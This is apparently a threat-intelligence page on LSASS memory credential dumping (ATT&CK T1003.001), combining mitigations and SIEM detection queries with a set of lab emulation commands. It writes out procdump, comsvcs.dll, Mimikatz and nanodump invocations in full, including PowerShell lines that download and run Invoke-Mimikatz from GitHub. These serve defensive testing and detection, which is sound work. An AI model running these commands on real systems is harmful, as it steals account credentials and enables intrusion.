Home/ATT&CK Technique/LSASS Memory
ATT&CK Technique

LSASS Memory

T1003.001 · credential-access

Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement using Use Alternate Authentication Material.

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump: procdump -ma lsass.exe lsass_dump Locally, mimikatz can be run using: sekurlsa::Minidump lsassdump.dmp sekurlsa::logonPasswords Built-in Windows tools such as comsvcs.dll can also be used: rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full Similar to Image File Execution Options Injection, the silent process exit mechanism can be abused to create a memory dump of lsass.exe through Windows Error Reporting (WerFault.exe). Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start.

Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.

The following SSPs can be used to access credentials: Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.

Windows

Actors Using This

14
iranAgrius
russia_speaking_cybercrimeAkira
russia_speaking_cybercrimeALPHV / BlackCat
north_koreaAndariel
unknown_likely_russia_alignedAnubis Ransomware
chinaAoqin Dragon
chinaAPT10
chinaAPT17
chinaAPT1
russiaAPT28
chinaAPT31
iranAPT33
iranOilRig
iranAPT35

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
execution earlier
T1569 · System Services ×1.28
persistence earlier
T1136.001 · Local Account ×1.28
privilege-escalation earlier
T1546.001 · Change Default File Association ×1.28T1546.011 · Application Shimming ×1.28
credential-access same
T1003.005 · Cached Domain Credentials ×1.28T1003.003 · NTDS ×1.28T1110.004 · Credential Stuffing ×1.28
discovery later
T1087.001 · Local Account ×1.28T1069.001 · Local Groups ×1.28
lateral-movement later
T1210 · Exploitation of Remote Services ×1.28
command-and-control later
T1219 · Remote Access Tools ×1.28
other same
T1564.003 · Hidden Window ×1.28T1480 · Execution Guardrails ×1.28T1480.001 · Environmental Keying ×1.28T1218.001 · Compiled HTML File ×1.28

Atomic Tests

14
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
command_promptelevatedwindowsDump LSASS.exe Memory using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. 
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
powershellelevatedwindowsDump LSASS.exe Memory using comsvcs.dll
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp. 
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
command_promptelevatedwindowsDump LSASS.exe Memory using direct system calls and API unhooking
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp. If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first. 
"#{dumpert_exe}"
command_promptelevatedwindowsDump LSASS.exe Memory using NanoDump
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection. https://github.com/helpsystems/nanodump Upon successful execution, you should find the nanondump.dmp file in the temp directory 
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
manualwindowsDump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions.
command_promptelevatedwindowsOffline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands. 
"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
command_promptelevatedwindowsLSASS read with pypykatz
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple usernames and passwords/hashes to the screen. Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. 
"#{venv_path}\Scripts\pypykatz" live lsa
powershellelevatedwindowsDump LSASS.exe Memory using Out-Minidump.ps1
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp. Author of Out-Minidump: Matthew Graeber (@mattifestation) 
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
command_promptelevatedwindowsCreate Mini Dump of LSASS.exe using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. 
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
powershellelevatedwindowsPowershell Mimikatz
Dumps credentials from memory via Powershell by invoking a remote mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA" 
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
powershellelevatedwindowsDump LSASS with createdump.exe from .Net v5
Use createdump executable from .NET to create an LSASS dump. [Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20) 
$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
powershellelevatedwindowsDump LSASS.exe using imported Microsoft DLLs
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. 
#{xordump_exe} -out #{output_file} -x 0x41
powershellelevatedwindowsDump LSASS.exe using lolbin rdrleakdiag.exe
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with lolbin rdrleakdiag.exe. Upon successful execution, you should see the following files created, $env:TEMP\minidump_<PID>.dmp and $env:TEMP\results_<PID>.hlk. 
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
  } elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
  } else {
      $binary_path = "File not found"
      exit 1
  }
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force} 
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
command_promptelevatedwindowsDump LSASS.exe Memory through Silent Process Exit
WerFault.exe (Windows Error Reporting process that handles process crashes) can be abused to create a memory dump of lsass.exe, in a directory of your choice. This method relies on a mechanism introduced in Windows 7 called Silent Process Exit, which provides the ability to trigger specific actions for a monitored process in one of two scenarios; either the process terminates itself by calling ExitProcess(), or another process terminates it via the TerminateProcess() API. The major advantage of this technique is that it does not cause lsass.exe to crash, and since WerFault.exe is used to create file dumps all the time (not just lsass.exe), this method provides the added advantage of going undetected. WerFault.exe is a process known for dumping every crashing process, from an attacker standpoint this is appealing as their illicit credential extraction will appear benign because from a defender’s viewpoint it’s within the realm of normal activity. Upon successful execution, you should find the dump file in directory of your choice or "%temp%\SilentProcessExit" by default. 
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"

Mitigations

7
MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.
M1017User Training

User Training involves educating employees and contractors on recognizing, reporting, and preventing cyber threats that rely on human interaction, such as phishing, social engineering, and other manipulative techniques. Comprehensive training programs create a human firewall by empowering users to be an active component of the organization's cybersecurity defenses.

Create Comprehensive Training Programs
  • Design training modules tailored to the organization's risk profile, covering topics such as phishing, password management, and incident reporting.
  • Provide role-specific training for high-risk employees, such as helpdesk staff or executives.
Use Simulated Exercises
  • Conduct phishing simulations to measure user susceptibility and provide targeted follow-up training.
  • Run social engineering drills to evaluate employee responses and reinforce protocols.
Leverage Gamification and Engagement
  • Introduce interactive learning methods such as quizzes, gamified challenges, and rewards for successful detection and reporting of threats.
Incorporate Security Policies into Onboarding
  • Include cybersecurity training as part of the onboarding process for new employees.
  • Provide easy-to-understand materials outlining acceptable use policies and reporting procedures.
Regular Refresher Courses
  • Update training materials to include emerging threats and techniques used by adversaries.
  • Ensure all employees complete periodic refresher courses to stay informed.
Emphasize Real-World Scenarios
  • Use case studies of recent attacks to demonstrate the consequences of successful phishing or social engineering.
  • Discuss how specific employee actions can prevent or mitigate such attacks.
M1025Privileged Process Integrity

Privileged Process Integrity focuses on defending highly privileged processes (e.g., system services, antivirus, or authentication processes) from tampering, injection, or compromise by adversaries. These processes often interact with critical components, making them prime targets for techniques like code injection, privilege escalation, and process manipulation.

Protected Process Mechanisms
  • Enable RunAsPPL on Windows systems to protect LSASS and other critical processes.
  • Use registry modifications to enforce protected process settings: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL Anti-Injection and Memory Protection:.
  • Enable Control Flow Guard (CFG), DEP, and ASLR to protect against process memory tampering.
  • Deploy endpoint protection tools that actively block process injection attempts.
Code Signing Validation
  • Implement policies for Windows Defender Application Control (WDAC) or AppLocker to enforce execution of signed binaries.
  • Ensure critical processes are signed with valid certificates.
Access Controls
  • Use DACLs and MIC to limit which users and processes can interact with privileged processes.
  • Disable unnecessary debugging capabilities for high-privileged processes.
Kernel-Level Protections
  • Ensure Kernel Patch Protection (PatchGuard) is enabled on Windows systems.
  • Leverage SELinux or AppArmor on Linux to enforce kernel-level security policies.
Tools for Implementation Protected Process Light (PPL)
  • RunAsPPL (Windows)
Windows Defender Credential Guard Code Integrity and Signing
  • Windows Defender Application Control (WDAC)
  • AppLocker.
SELinux/AppArmor (Linux) Memory Protection
  • Control Flow Guard (CFG), Data Execution Prevention (DEP), ASLR Process Isolation/Sandboxing:.
  • Firejail (Linux Sandbox)
  • Windows Sandbox.
QEMU/KVM-based isolation Kernel Protection
  • PatchGuard (Windows Kernel Patch Protection)
  • SELinux (Mandatory Access Control for Linux)
  • AppArmor.
M1026Privileged Account Management

Privileged Account Management focuses on implementing policies, controls, and tools to securely manage privileged accounts (e.g., SYSTEM, root, or administrative accounts). This includes restricting access, limiting the scope of permissions, monitoring privileged account usage, and ensuring accountability through logging and auditing.

Account Permissions and Roles
  • Implement RBAC and least privilege principles to allocate permissions securely.
  • Use tools like Active Directory Group Policies to enforce access restrictions.
Credential Security
  • Deploy password vaulting tools like CyberArk, HashiCorp Vault, or KeePass for secure storage and rotation of credentials.
  • Enforce password policies for complexity, uniqueness, and expiration using tools like Microsoft Group Policy Objects (GPO).
Multi-Factor Authentication (MFA)
  • Enforce MFA for all privileged accounts using Duo Security, Okta, or Microsoft Azure AD MFA.
Privileged Access Management (PAM)
  • Use PAM solutions like CyberArk, BeyondTrust, or Thycotic to manage, monitor, and audit privileged access.
Auditing and Monitoring
  • Integrate activity monitoring into your SIEM (e.g., Splunk or QRadar) to detect and alert on anomalous privileged account usage.
Just-In-Time Access
  • Deploy JIT solutions like Azure Privileged Identity Management (PIM) or configure ephemeral roles in AWS and GCP to grant time-limited elevated permissions.
Tools for Implementation Privileged Access Management (PAM)
  • CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.
Credential Management
  • Microsoft LAPS (Local Admin Password Solution), Password Safe, HashiCorp Vault, KeePass.
Multi-Factor Authentication
  • Duo Security, Okta, Microsoft Azure MFA, Google Authenticator.
Linux Privilege Management
  • sudo configuration, SELinux, AppArmor.
Just-In-Time Access
  • Azure Privileged Identity Management (PIM), AWS IAM Roles with session constraints, GCP Identity-Aware Proxy.
M1027Password Policies

Set and enforce secure password policies for accounts to reduce the likelihood of unauthorized access. Strong password policies include enforcing password complexity, requiring regular password changes, and preventing password reuse.

Windows Systems
Use Group Policy Management Console (GPMC) to configure
  • Minimum password length (e.g., 12+ characters).
  • Password complexity requirements.
  • Password history (e.g., disallow last 24 passwords).
  • Account lockout duration and thresholds.
Linux Systems
Configure Pluggable Authentication Modules (PAM)
  • Use pam_pwquality to enforce complexity and length requirements.
  • Implement pam_tally2 or pam_faillock for account lockouts.
  • Use pwunconv to disable password reuse.
Password Managers
  • Enforce usage of enterprise password managers (e.g., Bitwarden, 1Password, LastPass) to generate and store strong passwords.
Password Blacklisting
  • Use tools like Have I Been Pwned password checks or NIST-based blacklist solutions to prevent users from setting compromised passwords.
Regular Auditing
  • Periodically audit password policies and account configurations to ensure compliance using tools like LAPS (Local Admin Password Solution) and vulnerability scanners.
Tools for Implementation Windows
  • Group Policy Management Console (GPMC): Enforce password policies.
  • Microsoft Local Administrator Password Solution (LAPS): Enforce random, unique admin passwords.
Linux/macOS
  • PAM Modules (pam_pwquality, pam_tally2, pam_faillock): Enforce password rules.
  • Lynis: Audit password policies and system configurations.
Cross-Platform
  • Password Managers (Bitwarden, 1Password, KeePass): Manage and enforce strong passwords.
  • Have I Been Pwned API: Prevent the use of breached passwords.
  • NIST SP 800-63B compliant tools: Enforce password guidelines and blacklisting.
M1028Operating System Configuration

Operating System Configuration involves adjusting system settings and hardening the default configurations of an operating system (OS) to mitigate adversary exploitation and prevent abuse of system functionality. Proper OS configurations address security vulnerabilities, limit attack surfaces, and ensure robust defense against a wide range of techniques.

Disable Unused Features
  • Turn off SMBv1, LLMNR, and NetBIOS where not needed.
  • Disable remote registry and unnecessary services.
Enforce OS-level Protections
  • Enable Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), and Control Flow Guard (CFG) on Windows.
  • Use AppArmor or SELinux on Linux for mandatory access controls.
Secure Access Settings
  • Enable User Account Control (UAC) for Windows.
  • Restrict root/sudo access on Linux/macOS and enforce strong permissions using sudoers files.
File System Hardening
  • Implement least-privilege access for critical files and system directories.
  • Audit permissions regularly using tools like icacls (Windows) or getfacl/chmod (Linux/macOS).
Secure Remote Access
  • Restrict RDP, SSH, and VNC to authorized IPs using firewall rules.
  • Enable NLA for RDP and enforce strong password/lockout policies.
Harden Boot Configurations
  • Enable Secure Boot and enforce UEFI/BIOS password protection.
  • Use BitLocker or LUKS to encrypt boot drives.
Regular Audits
  • Periodically audit OS configurations using tools like CIS Benchmarks or SCAP tools.
Tools for Implementation Windows
  • Microsoft Group Policy Objects (GPO): Centrally enforce OS security settings.
  • Windows Defender Exploit Guard: Built-in OS protection against exploits.
  • CIS-CAT Pro: Audit Windows security configurations based on CIS Benchmarks.
Linux/macOS
  • AppArmor/SELinux: Enforce mandatory access controls.
  • Lynis: Perform comprehensive security audits.
  • SCAP Security Guide: Automate configuration hardening using Security Content Automation Protocol.
Cross-Platform
  • Ansible or Chef/Puppet: Automate configuration hardening at scale.
  • OpenSCAP: Perform compliance and configuration checks.
M1040Behavior Prevention on Endpoint

Behavior Prevention on Endpoint refers to the use of technologies and strategies to detect and block potentially malicious activities by analyzing the behavior of processes, files, API calls, and other endpoint events. Rather than relying solely on known signatures, this approach leverages heuristics, machine learning, and real-time monitoring to identify anomalous patterns indicative of an attack.

Suspicious Process Behavior
  • Implementation: Use Endpoint Detection and Response (EDR) tools to monitor and block processes exhibiting unusual behavior, such as privilege escalation attempts.
  • Use Case: An attacker uses a known vulnerability to spawn a privileged process from a user-level application. The endpoint tool detects the abnormal parent-child process relationship and blocks the action.
Unauthorized File Access
  • Implementation: Leverage Data Loss Prevention (DLP) or endpoint tools to block processes attempting to access sensitive files without proper authorization.
  • Use Case: A process tries to read or modify a sensitive file located in a restricted directory, such as /etc/shadow on Linux or the SAM registry hive on Windows. The endpoint tool identifies this anomalous behavior and prevents it.
Abnormal API Calls
  • Implementation: Implement runtime analysis tools to monitor API calls and block those associated with malicious activities.
  • Use Case: A process dynamically injects itself into another process to hijack its execution. The endpoint detects the abnormal use of APIs like OpenProcess and WriteProcessMemory and terminates the offending process.
Exploit Prevention
  • Implementation: Use behavioral exploit prevention tools to detect and block exploits attempting to gain unauthorized access.
  • Use Case: A buffer overflow exploit is launched against a vulnerable application. The endpoint detects the anomalous memory write operation and halts the process.
M1043Credential Access Protection

Credential Access Protection focuses on implementing measures to prevent adversaries from obtaining credentials, such as passwords, hashes, tokens, or keys, that could be used for unauthorized access. This involves restricting access to credential storage mechanisms, hardening configurations to block credential dumping methods, and using monitoring tools to detect suspicious credential-related activity.

Restrict Access to Credential Storage
  • Use Case: Prevent adversaries from accessing the SAM (Security Account Manager) database on Windows systems.
  • Implementation: Enforce least privilege principles and restrict administrative access to credential stores such as C:\Windows\System32\config\SAM.
Use Credential Guard
  • Use Case: Isolate LSASS (Local Security Authority Subsystem Service) memory to prevent credential dumping.
  • Implementation: Enable Windows Defender Credential Guard on enterprise endpoints to isolate secrets and protect them from unauthorized access.
Monitor for Credential Dumping Tools
  • Use Case: Detect and block known tools like Mimikatz or Windows Credential Editor.
  • Implementation: Flag suspicious process behavior related to credential dumping.
Disable Cached Credentials
  • Use Case: Prevent adversaries from exploiting cached credentials on endpoints.
  • Implementation: Configure group policy to reduce or eliminate the use of cached credentials (e.g., set Interactive logon: Number of previous logons to cache to 0).
Enable Secure Boot and Memory Protections
  • Use Case: Prevent memory-based attacks used to extract credentials.
  • Implementation: Configure Secure Boot and enforce hardware-based security features like DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization).

Detection Coverage

2/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 73
Analytics (MITRE CAR) 5
Runtime / container (Falco) none
File / malware (YARA) none
Network (Suricata/Snort) none
Vuln scan (Nuclei) none

CAR Analytics

5
MITRE Cyber Analytics Repository - field-tested detection logic for this technique, written as pseudocode/queries you adapt to your own SIEM (Splunk, Sentinel, EQL). Each is a ready starting point for a detection rule, not just a description.
CAR-2013-07-001Low coverageSuspicious Arguments

Malicious actors may rename built-in commands or external tools, such as those provided by SysInternals, to better blend in with the environment. In those cases, the file path name is arbitrary and may blend in well with the background. If the arguments are closely inspected, it may be possible to infer what tools are running and understand what an adversary is doing.

When any legitimate software shares the same command lines, it must be whitelisted according to the expected parameters. Any tool of interest with commonly known command line usage can be detecting by command line analysis.

Known substrings of command lines include
  • PuTTY.
  • port forwarding -R * -pw.
  • secure copy (scp) -pw @*.
  • mimikatz sekurlsa::.
  • RAR -hp .
  • Archive a Additionally, it may be useful to find IP addresses in the command line.
  • \d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} Logically this analytic makes use of [CAR-2014-03-005](../CAR-2014-03-005).
pseudocode
process = search Process:Create
port_fwd = filter process where (command_line match "-R .* -pw")
scp = filter process where (command_line match "-pw .* .* .*@.*"
mimikatz = filter process where (command_line match "sekurlsa")
rar = filter process where (command_line match " -hp ")
archive = filter process where (command_line match ".* a .*")
ip_addr = filter process where (command_line match \d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})

output port_fwd, scp, mimikatz, rar, archive, ip_addr
splunk
index=__your_sysmon_index__ EventCode=1 (CommandLine="* -R * -pw*" OR CommandLine="* -pw * *@*" OR CommandLine="*sekurlsa*" OR CommandLine="* -hp *" OR CommandLine="* a *")
EQL
process where subtype.create and
  (command_line == "* -R * -pw*" or command_line == "* -pw * *@*" or command_line == "*sekurlsa*" or command_line == "* -hp *" or command_line == "* a *")
splunk
index=__your_sysmon_index__ EventCode=1 |regex CommandLine=".*\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){3}\b.*"
DNIF
_fetch * from event where $LogName=WINDOWS-SYSMON AND $EventID=1 AND $Process=regex(.*(\-r.*\-pw|\-pw.*\@|sekurlsa|\-hp| a |\\d\{1\,3\}\\\.\\d\{1\,3\}\\\.\\d\{1\,3\}).*)i limit 100
LogPoint
norm_id=WindowsSysmon event_id=1 (command="* -R * -pw*" OR command="* -pw * *@*" OR command="*sekurlsa*" OR command="* -hp *" OR command="* a *")
CAR-2019-04-004Low coverageCredential Dumping via Mimikatz

Credential dumpers like Mimikatz can be loaded into memory and from there read data from another processes. This analytic looks for instances where processes are requesting specific permissions to read parts of the LSASS process in order to detect when credential dumping is occurring. One weakness is that all current implementations are “overtuned” to look for common access patterns used by Mimikatz. *This requires information about process access, e.g.

Sysmon Event ID 10. That currently doesn’t have a CAR data model mapping, since we currently lack any open/access actions for Processes. If this changes, we will update the data model requirements.*.

splunk - Common Mimikatz GrantedAccess Patterns
index=__your_sysmon_data__ EventCode=10
TargetImage="C:\\WINDOWS\\system32\\lsass.exe"
(GrantedAccess=0x1410 OR GrantedAccess=0x1010 OR GrantedAccess=0x1438 OR GrantedAccess=0x143a OR GrantedAccess=0x1418)
CallTrace="C:\\windows\\SYSTEM32\\ntdll.dll+*|C:\\windows\\System32\\KERNELBASE.dll+20edd|UNKNOWN(*)"
| table _time hostname user SourceImage GrantedAccess
splunk - Outliers
earliest=-d@d latest=now() index=__your_sysmon_data__
  EventCode=10
  TargetImage="C:\\WINDOWS\\system32\\lsass.exe"
  (GrantedAccess=0x1410 OR GrantedAccess=0x1010 OR GrantedAccess=0x1438 OR GrantedAccess=0x143a OR GrantedAccess=0x1418)
| search NOT [ search earliest=-7d@d latest=-2d@d index=__your_sysmon_data__ EventCode=10 TargetImage="C:\\WINDOWS\\system32\\lsass.exe" (GrantedAccess=0x1410 OR GrantedAccess=0x1010 OR GrantedAccess=0x1438 OR GrantedAccess=0x143a OR GrantedAccess=0x1418)
  | dedup SourceImage
  | fields SourceImage ]
| table  _time hostname user SourceImage GrantedAccess
LogPoint
norm_id=WindowsSysmon event_id=10 image="C:\Windows\system32\lsass.exe" (access="0x1410" OR access="0x1010" OR access="0x1438" OR access="0x143a" OR access="0x1418") call_trace="C:\windows\SYSTEM32\ntdll.dll+*|C:\windows\System32\KERNELBASE.dll+20edd|UNKNOWN(*)"
| fields log_ts, host, user, source_image, access
CAR-2019-07-002Low coverageLsass Process Dump via Procdump

ProcDump is a sysinternal command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. ProcDump may be used to dump the memory space of lsass.exe to disk for processing with a credential access tool such as Mimikatz. This is performed by launching procdump.exe as a privileged user with command line options indicating that lsass.exe should be dumped to a file with an arbitrary name.

Note
  • the CAR data model currently does not support process access actions, so the pseudocode implementation is based around process creates.
Pseudocode - Procdump - Process Create
processes = search Process:Create
procdump_lsass = filter processes where (
  exe = "procdump*.exe"  and
  command_line = "*lsass*")
output procdump_lsass
Splunk - Procdump - Process Create
index=__your_sysmon_index__ EventCode=1 Image="*\\procdump*.exe" CommandLine="*lsass*"
Splunk - Procdump - Process Access
index=__your_sysmon_index__ EventCode=10 TargetImage="C:\\WINDOWS\\system32\\lsass.exe" GrantedAccess="0x1FFFFF" ("procdump")
LogPoint
norm_id=WindowsSysmon event_id=1 image="*\procdump*.exe" command="*lsass*"
CAR-2019-08-001Low coverageCredential Dumping via Windows Task Manager

The Windows Task Manager may be used to dump the memory space of lsass.exe to disk for processing with a credential access tool such as Mimikatz. This is performed by launching Task Manager as a privileged user, selecting lsass.exe, and clicking "Create dump file". This saves a dump file to disk with a deterministic name that includes the name of the process being dumped.

This requires filesystem data to determine whether files have been created.

Pseudocode - Procdump - File Create
files = search File:Create
lsass_dump = filter files where (
  file_name = "lsass*.dmp"  and
  image_path = "C:\Windows\*\taskmgr.exe")
output lsass_dump
Splunk - Procdump - File Create
index=__your_sysmon_index__ EventCode=11 TargetFilename="*lsass*.dmp" Image="C:\\Windows\\*\\taskmgr.exe"
EQL - Procdump - File Create
file where file_name == "lsass*.dmp" and process_name == "taskmgr.exe"
LogPoint
norm_id=WindowsSysmon event_id=11 file="*lsass*.dmp" source_image="C:\Windows\*\taskmgr.exe"
CAR-2021-05-011Moderate coverageCreate Remote Thread into LSASS

Actors may create a remote thread into the LSASS service as part of a workflow to dump credentials.

Pseudocode - Pseudocode - Remote thread creation into LSASS
remote_threads = search Thread:remote_create
lsass_remote_create = filter remote_threads where "lsass" in raw event
output lsass_remote_create
Splunk - Splunk code
`sysmon` EventID=8 TargetImage=*lsass.exe | stats count min(_time) as firstTime max(_time) as lastTime by Computer, EventCode, TargetImage, TargetProcessId | rename Computer as dest

Caldera Emulation

3
MITRE Caldera abilities that emulate this technique - each is an executable action for automated adversary emulation.
credential-accesswindowsLeverage Procdump for lsass memory
$ps_url = "https://download.sysinternals.com/files/Procdump.zip";
$download_folder = "C:\Users\Public\";
$staging_folder = "C:\Users\Public\temp";
Start-BitsTransfer -Source $ps_url -Destination $download_folder;
Expand-Archive -LiteralPath $download_folder"Procdump.zip" -DestinationPath $staging_folder;
$arch=[System.Environment]::Is64BitOperatingSystem;

if ($arch) {
    iex $staging_folder"\procdump64.exe -accepteula -ma lsass.exe" > $env:APPDATA\error.dmp 2>&1;
} else {
    iex $staging_folder"\procdump.exe -accepteula -ma lsass.exe" > $env:APPDATA\error.dmp 2>&1;
}
remove-item $staging_folder -Recurse;
credential-accesswindowsPowerkatz (Staged)
Import-Module .\invoke-mimi.ps1;
Invoke-Mimikatz -DumpCreds
credential-accesswindowsRun PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds

Comply & Defend

NIST 800-53AC-02, AC-03, AC-04, AC-05, AC-06, CA-07, CM-02, CM-05, CM-06, CM-07, IA-02, IA-05, SC-03, SC-28, SC-39, SI-02, SI-03, SI-04, SI-16
D3FEND12 defensive techniques
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKAtomic Red Teamcar (MITRE)
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin